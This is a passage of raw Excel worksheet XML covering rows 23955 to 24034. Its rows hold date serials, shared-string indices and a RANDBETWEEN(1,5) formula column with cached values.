      <c r="C23955" t="s">
        <v>10</v>
      </c>
      <c r="D23955" t="s">
        <v>89</v>
      </c>
      <c r="F23955">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23956" s="1">
        <v>43003.4768287037</v>
      </c>
      <c r="C23956" t="s">
        <v>10</v>
      </c>
      <c r="D23956" t="s">
        <v>89</v>
      </c>
      <c r="E23956" t="s">
        <v>21688</v>
      </c>
      <c r="F23956">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23957" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23957" s="1">
        <v>43003.471909722219</v>
      </c>
      <c r="C23957" t="s">
        <v>16</v>
      </c>
      <c r="E23957" s="2" t="s">
        <v>21689</v>
      </c>
      <c r="F23957">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23958" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23958" s="1">
        <v>43003.470057870371</v>
      </c>
      <c r="C23958" t="s">
        <v>10</v>
      </c>
      <c r="D23958" t="s">
        <v>89</v>
      </c>
      <c r="E23958" t="s">
        <v>21690</v>
      </c>
      <c r="F23958">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23959" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23959" s="1">
        <v>43003.469560185185</v>
      </c>
      <c r="C23959" t="s">
        <v>17</v>
      </c>
      <c r="E23959" s="2" t="s">
        <v>21691</v>
      </c>
      <c r="F23959">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23960" s="1">
        <v>43003.451805555553</v>
      </c>
      <c r="C23960" t="s">
        <v>10</v>
      </c>
      <c r="D23960" t="s">
        <v>632</v>
      </c>
      <c r="E23960" t="s">
        <v>21692</v>
      </c>
      <c r="F23960">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23961" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23961" s="1">
        <v>43003.448182870372</v>
      </c>
      <c r="C23961" t="s">
        <v>10</v>
      </c>
      <c r="D23961" t="s">
        <v>667</v>
      </c>
      <c r="E23961" s="2" t="s">
        <v>21693</v>
      </c>
      <c r="F23961">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23962" s="1">
        <v>43003.43509259259</v>
      </c>
      <c r="C23962" t="s">
        <v>10</v>
      </c>
      <c r="D23962" t="s">
        <v>33</v>
      </c>
      <c r="E23962" t="s">
        <v>21694</v>
      </c>
      <c r="F23962">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23963" s="1">
        <v>43003.432962962965</v>
      </c>
      <c r="C23963" t="s">
        <v>10</v>
      </c>
      <c r="D23963" t="s">
        <v>163</v>
      </c>
      <c r="E23963" t="s">
        <v>21695</v>
      </c>
      <c r="F23963">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23964" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23964" s="1">
        <v>43003.431087962963</v>
      </c>
      <c r="C23964" t="s">
        <v>1050</v>
      </c>
      <c r="E23964" s="2" t="s">
        <v>21696</v>
      </c>
      <c r="F23964">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23965" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23965" s="1">
        <v>43003.429583333331</v>
      </c>
      <c r="C23965" t="s">
        <v>65</v>
      </c>
      <c r="E23965" s="2" t="s">
        <v>21697</v>
      </c>
      <c r="F23965">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23966" s="1">
        <v>43003.427546296298</v>
      </c>
      <c r="C23966" t="s">
        <v>10</v>
      </c>
      <c r="D23966" t="s">
        <v>86</v>
      </c>
      <c r="E23966" t="s">
        <v>21698</v>
      </c>
      <c r="F23966">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23967" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23967" s="1">
        <v>43003.426145833335</v>
      </c>
      <c r="C23967" t="s">
        <v>6</v>
      </c>
      <c r="D23967" t="s">
        <v>25</v>
      </c>
      <c r="E23967" s="2" t="s">
        <v>21699</v>
      </c>
      <c r="F23967">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23968" s="1">
        <v>43003.415729166663</v>
      </c>
      <c r="C23968" t="s">
        <v>10</v>
      </c>
      <c r="D23968" t="s">
        <v>36</v>
      </c>
      <c r="E23968" t="s">
        <v>21700</v>
      </c>
      <c r="F23968">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23969" s="1">
        <v>43003.415729166663</v>
      </c>
      <c r="C23969" t="s">
        <v>48</v>
      </c>
      <c r="E23969" t="s">
        <v>21701</v>
      </c>
      <c r="F23969">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23970" s="1">
        <v>43003.413136574076</v>
      </c>
      <c r="C23970" t="s">
        <v>10</v>
      </c>
      <c r="D23970" t="s">
        <v>192</v>
      </c>
      <c r="E23970" t="s">
        <v>21702</v>
      </c>
      <c r="F23970">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23971" s="1">
        <v>43003.399953703702</v>
      </c>
      <c r="C23971" t="s">
        <v>124</v>
      </c>
      <c r="E23971" t="s">
        <v>21703</v>
      </c>
      <c r="F23971">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23972" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23972" s="1">
        <v>43003.383993055555</v>
      </c>
      <c r="C23972" t="s">
        <v>10</v>
      </c>
      <c r="D23972" t="s">
        <v>36</v>
      </c>
      <c r="E23972" s="2" t="s">
        <v>21704</v>
      </c>
      <c r="F23972">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23973" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23973" s="1">
        <v>43003.381608796299</v>
      </c>
      <c r="C23973" t="s">
        <v>65</v>
      </c>
      <c r="D23973" t="s">
        <v>312</v>
      </c>
      <c r="E23973" s="2" t="s">
        <v>21705</v>
      </c>
      <c r="F23973">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23974" s="1">
        <v>43003.315046296295</v>
      </c>
      <c r="C23974" t="s">
        <v>41</v>
      </c>
      <c r="E23974" t="s">
        <v>21706</v>
      </c>
      <c r="F23974">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23975" s="1">
        <v>43003.281018518515</v>
      </c>
      <c r="C23975" t="s">
        <v>41</v>
      </c>
      <c r="E23975" t="s">
        <v>21707</v>
      </c>
      <c r="F23975">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23976" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23976" s="1">
        <v>43003.228784722225</v>
      </c>
      <c r="C23976" t="s">
        <v>67</v>
      </c>
      <c r="E23976" s="2" t="s">
        <v>21708</v>
      </c>
      <c r="F23976">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23977" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23977" s="1">
        <v>43003.205069444448</v>
      </c>
      <c r="C23977" t="s">
        <v>471</v>
      </c>
      <c r="E23977" s="2" t="s">
        <v>21709</v>
      </c>
      <c r="F23977">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23978" s="1">
        <v>43003.200740740744</v>
      </c>
      <c r="C23978" t="s">
        <v>41</v>
      </c>
      <c r="E23978" t="s">
        <v>21710</v>
      </c>
      <c r="F23978">
        <f t="shared" ca="1" si="374"/>
        <v>1</v>
      </c>
    </row>
    <row r="23979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23979" s="1">
        <v>43003.198113425926</v>
      </c>
      <c r="C23979" t="s">
        <v>48</v>
      </c>
      <c r="E23979" t="s">
        <v>21711</v>
      </c>
      <c r="F23979">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23980" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23980" s="1">
        <v>43003.171990740739</v>
      </c>
      <c r="C23980" t="s">
        <v>65</v>
      </c>
      <c r="E23980" s="2" t="s">
        <v>21712</v>
      </c>
      <c r="F23980">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23981" s="1">
        <v>43003.161805555559</v>
      </c>
      <c r="C23981" t="s">
        <v>97</v>
      </c>
      <c r="E23981" t="s">
        <v>21713</v>
      </c>
      <c r="F23981">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23982" s="1">
        <v>43003.16101851852</v>
      </c>
      <c r="C23982" t="s">
        <v>50</v>
      </c>
      <c r="E23982" t="s">
        <v>21714</v>
      </c>
      <c r="F23982">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23983" s="1">
        <v>43003.15388888889</v>
      </c>
      <c r="C23983" t="s">
        <v>2552</v>
      </c>
      <c r="E23983" t="s">
        <v>21715</v>
      </c>
      <c r="F23983">
        <f t="shared" ca="1" si="374"/>
        <v>3</v>
      </c>
    </row>
    <row r="23984" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23984" s="1">
        <v>43003.084965277776</v>
      </c>
      <c r="C23984" t="s">
        <v>41</v>
      </c>
      <c r="E23984" s="2" t="s">
        <v>21716</v>
      </c>
      <c r="F23984">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23985" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23985" s="1">
        <v>43003.06453703704</v>
      </c>
      <c r="C23985" t="s">
        <v>197</v>
      </c>
      <c r="E23985" t="s">
        <v>21717</v>
      </c>
      <c r="F23985">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23986" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23986" s="1">
        <v>43003.064525462964</v>
      </c>
      <c r="C23986" t="s">
        <v>140</v>
      </c>
      <c r="D23986" t="s">
        <v>847</v>
      </c>
      <c r="E23986" s="2" t="s">
        <v>21718</v>
      </c>
      <c r="F23986">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23987" s="1">
        <v>43002.864363425928</v>
      </c>
      <c r="C23987" t="s">
        <v>10</v>
      </c>
      <c r="D23987" t="s">
        <v>23</v>
      </c>
      <c r="E23987" t="s">
        <v>21719</v>
      </c>
      <c r="F23987">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23988" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23988" s="1">
        <v>43002.422071759262</v>
      </c>
      <c r="C23988" t="s">
        <v>16</v>
      </c>
      <c r="E23988" s="2" t="s">
        <v>21720</v>
      </c>
      <c r="F23988">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23989" s="1">
        <v>43002.194525462961</v>
      </c>
      <c r="C23989" t="s">
        <v>6</v>
      </c>
      <c r="D23989" t="s">
        <v>67</v>
      </c>
      <c r="E23989" t="s">
        <v>21721</v>
      </c>
      <c r="F23989">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23990" s="1">
        <v>43001.931168981479</v>
      </c>
      <c r="C23990" t="s">
        <v>10</v>
      </c>
      <c r="D23990" t="s">
        <v>6</v>
      </c>
      <c r="E23990" t="s">
        <v>21722</v>
      </c>
      <c r="F23990">
        <f t="shared" ca="1" si="374"/>
        <v>1</v>
      </c>
    </row>
    <row r="23991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23991" s="1">
        <v>43001.747615740744</v>
      </c>
      <c r="C23991" t="s">
        <v>10</v>
      </c>
      <c r="D23991" t="s">
        <v>6</v>
      </c>
      <c r="E23991" t="s">
        <v>21723</v>
      </c>
      <c r="F23991">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="23992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23992" s="1">
        <v>43001.57402777778</v>
      </c>
      <c r="C23992" t="s">
        <v>471</v>
      </c>
      <c r="D23992" t="s">
        <v>312</v>
      </c>
      <c r="F23992">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23993" s="1">
        <v>43001.43241898148</v>
      </c>
      <c r="C23993" t="s">
        <v>124</v>
      </c>
      <c r="E23993" t="s">
        <v>21724</v>
      </c>
      <c r="F23993">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23994" s="1">
        <v>43001.31144675926</v>
      </c>
      <c r="C23994" t="s">
        <v>41</v>
      </c>
      <c r="E23994" t="s">
        <v>21725</v>
      </c>
      <c r="F23994">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23995" s="1">
        <v>43001.22047453704</v>
      </c>
      <c r="C23995" t="s">
        <v>60</v>
      </c>
      <c r="F23995">
        <f t="shared" ca="1" si="374"/>
        <v>1</v>
      </c>
    </row>
    <row r="23996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23996" s="1">
        <v>43001.156817129631</v>
      </c>
      <c r="C23996" t="s">
        <v>10</v>
      </c>
      <c r="D23996" t="s">
        <v>52</v>
      </c>
      <c r="E23996" t="s">
        <v>21726</v>
      </c>
      <c r="F23996">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23997" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23997" s="1">
        <v>43000.797071759262</v>
      </c>
      <c r="C23997" t="s">
        <v>10</v>
      </c>
      <c r="D23997" t="s">
        <v>80</v>
      </c>
      <c r="E23997" s="2" t="s">
        <v>21727</v>
      </c>
      <c r="F23997">
        <f t="shared" ca="1" si="374"/>
        <v>5</v>
      </c>
    </row>
    <row r="23998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23998" s="1">
        <v>43000.72179398148</v>
      </c>
      <c r="C23998" t="s">
        <v>10</v>
      </c>
      <c r="D23998" t="s">
        <v>494</v>
      </c>
      <c r="E23998" t="s">
        <v>21728</v>
      </c>
      <c r="F23998">
        <f t="shared" ca="1" si="374"/>
        <v>4</v>
      </c>
    </row>
    <row r="23999" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23999" s="1">
        <v>43000.657812500001</v>
      </c>
      <c r="C23999" t="s">
        <v>10</v>
      </c>
      <c r="D23999" t="s">
        <v>6</v>
      </c>
      <c r="E23999" s="2" t="s">
        <v>21729</v>
      </c>
      <c r="F23999">
        <f t="shared" ca="1" si="374"/>
        <v>1</v>
      </c>
    </row>
    <row r="24000" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24000" s="1">
        <v>43000.616307870368</v>
      </c>
      <c r="C24000" t="s">
        <v>10</v>
      </c>
      <c r="D24000" t="s">
        <v>158</v>
      </c>
      <c r="E24000" s="2" t="s">
        <v>21730</v>
      </c>
      <c r="F24000">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="24001" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24001" s="1">
        <v>43000.602349537039</v>
      </c>
      <c r="C24001" t="s">
        <v>10</v>
      </c>
      <c r="D24001" t="s">
        <v>374</v>
      </c>
      <c r="E24001" s="2" t="s">
        <v>21731</v>
      </c>
      <c r="F24001">
        <f t="shared" ca="1" si="374"/>
        <v>2</v>
      </c>
    </row>
    <row r="24002" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24002" s="1">
        <v>43000.586504629631</v>
      </c>
      <c r="C24002" t="s">
        <v>6</v>
      </c>
      <c r="D24002" t="s">
        <v>194</v>
      </c>
      <c r="E24002" s="2" t="s">
        <v>21732</v>
      </c>
      <c r="F24002">
        <f t="shared" ref="F24002:F24065" ca="1" si="375">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="24003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24003" s="1">
        <v>43000.562604166669</v>
      </c>
      <c r="C24003" t="s">
        <v>48</v>
      </c>
      <c r="E24003" t="s">
        <v>21733</v>
      </c>
      <c r="F24003">
        <f t="shared" ca="1" si="375"/>
        <v>1</v>
      </c>
    </row>
    <row r="24004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24004" s="1">
        <v>43000.553622685184</v>
      </c>
      <c r="C24004" t="s">
        <v>10</v>
      </c>
      <c r="D24004" t="s">
        <v>36</v>
      </c>
      <c r="E24004" t="s">
        <v>21734</v>
      </c>
      <c r="F24004">
        <f t="shared" ca="1" si="375"/>
        <v>3</v>
      </c>
    </row>
    <row r="24005" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24005" s="1">
        <v>43000.5390162037</v>
      </c>
      <c r="C24005" t="s">
        <v>10</v>
      </c>
      <c r="D24005" t="s">
        <v>94</v>
      </c>
      <c r="E24005" t="s">
        <v>21735</v>
      </c>
      <c r="F24005">
        <f t="shared" ca="1" si="375"/>
        <v>1</v>
      </c>
    </row>
    <row r="24006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24006" s="1">
        <v>43000.520324074074</v>
      </c>
      <c r="C24006" t="s">
        <v>10</v>
      </c>
      <c r="D24006" t="s">
        <v>6</v>
      </c>
      <c r="E24006" t="s">
        <v>21736</v>
      </c>
      <c r="F24006">
        <f t="shared" ca="1" si="375"/>
        <v>2</v>
      </c>
    </row>
    <row r="24007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24007" s="1">
        <v>43000.520312499997</v>
      </c>
      <c r="C24007" t="s">
        <v>10</v>
      </c>
      <c r="D24007" t="s">
        <v>46</v>
      </c>
      <c r="E24007" t="s">
        <v>21737</v>
      </c>
      <c r="F24007">
        <f t="shared" ca="1" si="375"/>
        <v>2</v>
      </c>
    </row>
    <row r="24008" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24008" s="1">
        <v>43000.505150462966</v>
      </c>
      <c r="C24008" t="s">
        <v>173</v>
      </c>
      <c r="E24008" s="2" t="s">
        <v>21738</v>
      </c>
      <c r="F24008">
        <f t="shared" ca="1" si="375"/>
        <v>1</v>
      </c>
    </row>
    <row r="24009" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24009" s="1">
        <v>43000.500775462962</v>
      </c>
      <c r="C24009" t="s">
        <v>173</v>
      </c>
      <c r="E24009" s="2" t="s">
        <v>21739</v>
      </c>
      <c r="F24009">
        <f t="shared" ca="1" si="375"/>
        <v>4</v>
      </c>
    </row>
    <row r="24010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24010" s="1">
        <v>43000.485115740739</v>
      </c>
      <c r="C24010" t="s">
        <v>344</v>
      </c>
      <c r="E24010" t="s">
        <v>21740</v>
      </c>
      <c r="F24010">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24011" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24011" s="1">
        <v>43000.479710648149</v>
      </c>
      <c r="C24011" t="s">
        <v>344</v>
      </c>
      <c r="E24011" s="2" t="s">
        <v>21741</v>
      </c>
      <c r="F24011">
        <f t="shared" ca="1" si="375"/>
        <v>3</v>
      </c>
    </row>
    <row r="24012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24012" s="1">
        <v>43000.472094907411</v>
      </c>
      <c r="C24012" t="s">
        <v>10</v>
      </c>
      <c r="D24012" t="s">
        <v>178</v>
      </c>
      <c r="E24012" t="s">
        <v>21742</v>
      </c>
      <c r="F24012">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24013" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A24013" s="1">
        <v>43000.455416666664</v>
      </c>
      <c r="C24013" t="s">
        <v>10</v>
      </c>
      <c r="D24013" t="s">
        <v>36</v>
      </c>
      <c r="E24013" s="2" t="s">
        <v>21743</v>
      </c>
      <c r="F24013">
        <f t="shared" ca="1" si="375"/>
        <v>4</v>
      </c>
    </row>
    <row r="24014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24014" s="1">
        <v>43000.451296296298</v>
      </c>
      <c r="C24014" t="s">
        <v>10</v>
      </c>
      <c r="D24014" t="s">
        <v>336</v>
      </c>
      <c r="E24014" t="s">
        <v>21744</v>
      </c>
      <c r="F24014">
        <f t="shared" ca="1" si="375"/>
        <v>2</v>
      </c>
    </row>
    <row r="24015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24015" s="1">
        <v>43000.448055555556</v>
      </c>
      <c r="C24015" t="s">
        <v>10</v>
      </c>
      <c r="D24015" t="s">
        <v>1036</v>
      </c>
      <c r="E24015" t="s">
        <v>21745</v>
      </c>
      <c r="F24015">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24016" s="1">
        <v>43000.442442129628</v>
      </c>
      <c r="C24016" t="s">
        <v>10</v>
      </c>
      <c r="D24016" t="s">
        <v>89</v>
      </c>
      <c r="E24016" t="s">
        <v>21746</v>
      </c>
      <c r="F24016">
        <f t="shared" ca="1" si="375"/>
        <v>3</v>
      </c>
    </row>
    <row r="24017" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24017" s="1">
        <v>43000.43886574074</v>
      </c>
      <c r="C24017" t="s">
        <v>10</v>
      </c>
      <c r="D24017" t="s">
        <v>14</v>
      </c>
      <c r="E24017" s="2" t="s">
        <v>21747</v>
      </c>
      <c r="F24017">
        <f t="shared" ca="1" si="375"/>
        <v>2</v>
      </c>
    </row>
    <row r="24018" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24018" s="1">
        <v>43000.425023148149</v>
      </c>
      <c r="C24018" t="s">
        <v>10</v>
      </c>
      <c r="D24018" t="s">
        <v>251</v>
      </c>
      <c r="E24018" s="2" t="s">
        <v>21748</v>
      </c>
      <c r="F24018">
        <f t="shared" ca="1" si="375"/>
        <v>1</v>
      </c>
    </row>
    <row r="24019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24019" s="1">
        <v>43000.422002314815</v>
      </c>
      <c r="C24019" t="s">
        <v>10</v>
      </c>
      <c r="D24019" t="s">
        <v>112</v>
      </c>
      <c r="E24019" t="s">
        <v>21749</v>
      </c>
      <c r="F24019">
        <f t="shared" ca="1" si="375"/>
        <v>3</v>
      </c>
    </row>
    <row r="24020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24020" s="1">
        <v>43000.366944444446</v>
      </c>
      <c r="C24020" t="s">
        <v>6</v>
      </c>
      <c r="D24020" t="s">
        <v>25</v>
      </c>
      <c r="E24020" t="s">
        <v>21750</v>
      </c>
      <c r="F24020">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24021" s="1">
        <v>43000.355381944442</v>
      </c>
      <c r="C24021" t="s">
        <v>124</v>
      </c>
      <c r="E24021" t="s">
        <v>21751</v>
      </c>
      <c r="F24021">
        <f t="shared" ca="1" si="375"/>
        <v>3</v>
      </c>
    </row>
    <row r="24022" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24022" s="1">
        <v>43000.328414351854</v>
      </c>
      <c r="C24022" t="s">
        <v>48</v>
      </c>
      <c r="E24022" s="2" t="s">
        <v>21752</v>
      </c>
      <c r="F24022">
        <f t="shared" ca="1" si="375"/>
        <v>1</v>
      </c>
    </row>
    <row r="24023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24023" s="1">
        <v>43000.317465277774</v>
      </c>
      <c r="C24023" t="s">
        <v>163</v>
      </c>
      <c r="E24023" t="s">
        <v>21753</v>
      </c>
      <c r="F24023">
        <f t="shared" ca="1" si="375"/>
        <v>3</v>
      </c>
    </row>
    <row r="24024" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24024" s="1">
        <v>43000.301215277781</v>
      </c>
      <c r="C24024" t="s">
        <v>71</v>
      </c>
      <c r="E24024" s="2" t="s">
        <v>21754</v>
      </c>
      <c r="F24024">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24025" s="1">
        <v>43000.279421296298</v>
      </c>
      <c r="C24025" t="s">
        <v>43</v>
      </c>
      <c r="E24025" t="s">
        <v>21755</v>
      </c>
      <c r="F24025">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24026" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24026" s="1">
        <v>43000.27107638889</v>
      </c>
      <c r="C24026" t="s">
        <v>173</v>
      </c>
      <c r="E24026" s="2" t="s">
        <v>21756</v>
      </c>
      <c r="F24026">
        <f t="shared" ca="1" si="375"/>
        <v>4</v>
      </c>
    </row>
    <row r="24027" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24027" s="1">
        <v>43000.255671296298</v>
      </c>
      <c r="C24027" t="s">
        <v>60</v>
      </c>
      <c r="D24027" t="s">
        <v>312</v>
      </c>
      <c r="E24027" s="2" t="s">
        <v>21757</v>
      </c>
      <c r="F24027">
        <f t="shared" ca="1" si="375"/>
        <v>4</v>
      </c>
    </row>
    <row r="24028" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24028" s="1">
        <v>43000.250104166669</v>
      </c>
      <c r="C24028" t="s">
        <v>48</v>
      </c>
      <c r="E24028" s="2" t="s">
        <v>21758</v>
      </c>
      <c r="F24028">
        <f t="shared" ca="1" si="375"/>
        <v>2</v>
      </c>
    </row>
    <row r="24029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24029" s="1">
        <v>43000.230254629627</v>
      </c>
      <c r="C24029" t="s">
        <v>10</v>
      </c>
      <c r="D24029" t="s">
        <v>178</v>
      </c>
      <c r="E24029" t="s">
        <v>21759</v>
      </c>
      <c r="F24029">
        <f t="shared" ca="1" si="375"/>
        <v>4</v>
      </c>
    </row>
    <row r="24030" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24030" s="1">
        <v>43000.180763888886</v>
      </c>
      <c r="C24030" t="s">
        <v>48</v>
      </c>
      <c r="E24030" s="2" t="s">
        <v>21760</v>
      </c>
      <c r="F24030">
        <f t="shared" ca="1" si="375"/>
        <v>2</v>
      </c>
    </row>
    <row r="24031" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24031" s="1">
        <v>43000.103935185187</v>
      </c>
      <c r="C24031" t="s">
        <v>301</v>
      </c>
      <c r="E24031" s="2" t="s">
        <v>21761</v>
      </c>
      <c r="F24031">
        <f t="shared" ca="1" si="375"/>
        <v>2</v>
      </c>
    </row>
    <row r="24032" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24032" s="1">
        <v>43000.080509259256</v>
      </c>
      <c r="C24032" t="s">
        <v>60</v>
      </c>
      <c r="E24032" s="2" t="s">
        <v>21762</v>
      </c>
      <c r="F24032">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24033" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24033" s="1">
        <v>43000.069340277776</v>
      </c>
      <c r="C24033" t="s">
        <v>41</v>
      </c>
      <c r="E24033" s="2" t="s">
        <v>21763</v>
      </c>
      <c r="F24033">
        <f t="shared" ca="1" si="375"/>
        <v>5</v>
      </c>
    </row>
    <row r="24034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24034" s="1">
        <v>43000.021203703705</v>
      </c>
      <c r="C24034" t="s">
        <v>41</v>
      </c>
      <c r="E24034" t="s">
        <v>21764</v>
      </c>
      <c r="F24034">
        <f t="shared" ca="1" si="375"/>
